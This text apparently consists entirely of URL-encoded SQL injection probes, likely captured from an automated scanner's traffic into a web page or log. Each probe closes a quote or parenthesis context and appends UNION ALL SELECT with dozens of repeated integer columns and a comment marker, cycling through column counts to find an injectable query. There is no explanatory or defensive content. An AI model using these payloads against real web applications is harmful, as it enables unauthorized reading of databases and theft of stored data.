-7140%22%29%20UNION%20ALL%20SELECT%207743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%2C7743%23 -9106%22%29%20UNION%20ALL%20SELECT%205211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%23 -3407%22%29%20UNION%20ALL%20SELECT%204172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%2C4172%23 -4906%22%29%20UNION%20ALL%20SELECT%207168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%2C7168%23 -8617%22%29%20UNION%20ALL%20SELECT%203645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%23 -3240%22%29%20UNION%20ALL%20SELECT%205881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%2C5881%23 -9308%22%29%20UNION%20ALL%20SELECT%204349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%2C4349%23 -5732%22%29%20UNION%20ALL%20SELECT%206019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%2C6019%23 -9823%22%29%29%20UNION%20ALL%20SELECT%206226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%23 -9817%22%29%29%20UNION%20ALL%20SELECT%204556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%2C4556%23 -2000%22%29%29%20UNION%20ALL%20SELECT%203456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%23 -1555%22%29%29%20UNION%20ALL%20SELECT%209539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%2C9539%23 -5963%22%29%29%20UNION%20ALL%20SELECT%201300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%23 -6200%22%29%29%20UNION%20ALL%20SELECT%201771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%23 -3875%22%29%29%20UNION%20ALL%20SELECT%206164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%2C6164%23 -1179%22%29%29%20UNION%20ALL%20SELECT%209506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%2C9506%23 -3165%22%29%29%20UNION%20ALL%20SELECT%201939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%2C1939%23 -7599%22%29%29%20UNION%20ALL%20SELECT%201573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%23 -5435%22%29%29%29%20UNION%20ALL%20SELECT%205349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%2C5349%23 -8365%22%29%29%29%20UNION%20ALL%20SELECT%203132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%2C3132%23 -3991%22%29%29%29%20UNION%20ALL%20SELECT%209341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%23 -2696%22%29%29%29%20UNION%20ALL%20SELECT%201721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%2C1721%23 -5534%22%29%29%29%20UNION%20ALL%20SELECT%208175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%2C8175%23 -3201%22%29%29%29%20UNION%20ALL%20SELECT%204385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%2C4385%23 -2347%22%29%29%29%20UNION%20ALL%20SELECT%204797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%2C4797%23 -6630%22%29%29%29%20UNION%20ALL%20SELECT%201029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%2C1029%23 -4674%22%29%29%29%20UNION%20ALL%20SELECT%204587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%23 -1034%22%29%29%29%20UNION%20ALL%20SELECT%209964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%2C9964%23 -2775%22%20UNION%20ALL%20SELECT%204072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%23 -3925%22%20UNION%20ALL%20SELECT%203683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%23 -9231%22%20UNION%20ALL%20SELECT%206833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%2C6833%23 -8403%22%20UNION%20ALL%20SELECT%207756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%23 -4905%22%20UNION%20ALL%20SELECT%207217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%23 -6868%22%20UNION%20ALL%20SELECT%204123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%2C4123%23 -6193%22%20UNION%20ALL%20SELECT%209104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%2C9104%23 -4351%22%20UNION%20ALL%20SELECT%206915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%23 -8462%22%20UNION%20ALL%20SELECT%202199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%2C2199%23 -5302%22%20UNION%20ALL%20SELECT%204567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%2C4567%23 -8190%25%27%29%20UNION%20ALL%20SELECT%205350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%2C5350%23 -1662%25%27%29%20UNION%20ALL%20SELECT%208327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%23 -6937%25%27%29%20UNION%20ALL%20SELECT%201419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%23 -9721%25%27%29%20UNION%20ALL%20SELECT%207934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%2C7934%23 -4191%25%27%29%20UNION%20ALL%20SELECT%208602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%2C8602%23 -5612%25%27%29%20UNION%20ALL%20SELECT%202154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%2C2154%23 -4327%25%27%29%20UNION%20ALL%20SELECT%207581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%2C7581%23 -2245%25%27%29%20UNION%20ALL%20SELECT%207451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%2C7451%23 -9791%25%27%29%20UNION%20ALL%20SELECT%208617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%2C8617%23 -6042%25%27%29%20UNION%20ALL%20SELECT%205790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%2C5790%23 -7781%25%27%29%29%20UNION%20ALL%20SELECT%205642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%2C5642%23 -9980%25%27%29%29%20UNION%20ALL%20SELECT%209775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%2C9775%23 -5901%25%27%29%29%20UNION%20ALL%20SELECT%204598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%23 -9833%25%27%29%29%20UNION%20ALL%20SELECT%202019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%2C2019%23 -9479%25%27%29%29%20UNION%20ALL%20SELECT%208621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%2C8621%23 -4928%25%27%29%29%20UNION%20ALL%20SELECT%208735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%2C8735%23 -6587%25%27%29%29%20UNION%20ALL%20SELECT%206025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%2C6025%23 -4792%25%27%29%29%20UNION%20ALL%20SELECT%205394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%2C5394%23 -6564%25%27%29%29%20UNION%20ALL%20SELECT%207592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%2C7592%23 -2356%25%27%29%29%20UNION%20ALL%20SELECT%206516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%2C6516%23 -2428%25%27%29%29%29%20UNION%20ALL%20SELECT%205829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%2C5829%23 